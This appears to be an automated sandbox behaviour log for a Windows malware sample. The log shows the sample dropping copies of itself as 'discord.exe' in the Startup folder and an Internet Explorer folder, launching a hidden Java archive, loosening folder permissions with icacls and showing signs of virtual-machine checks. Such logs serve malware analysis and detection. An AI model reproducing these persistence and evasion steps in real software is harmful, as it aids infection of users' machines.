Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe TID: 5660Thread sleep count: 682 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe TID: 4760Thread sleep count: 591 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe TID: 5452Thread sleep count: 548 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeWindow / User API: threadDelayed 746Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeWindow / User API: threadDelayed 682Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeWindow / User API: threadDelayed 591
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeWindow / User API: threadDelayed 548
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_161FFED0 sldt word ptr [eax]1_3_161FFED0
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: javaw.exe, 0000000D.00000003.300868074.0000000014A66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 0000000D.00000003.300868074.0000000014A66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.523726003.0000000002EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,java/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000002.523726003.0000000002EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |[Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000001.00000003.266679539.0000000015551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000003.266679539.0000000015551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
Source: uBZeAVcb6r.exe, 00000000.00000002.524157941.00000000013DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
Source: uBZeAVcb6r.exe, 00000000.00000002.524157941.000000000138E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.522702258.0000000001438000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.522825723.0000000000A98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Users\user\Desktop\uBZeAVcb6r.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
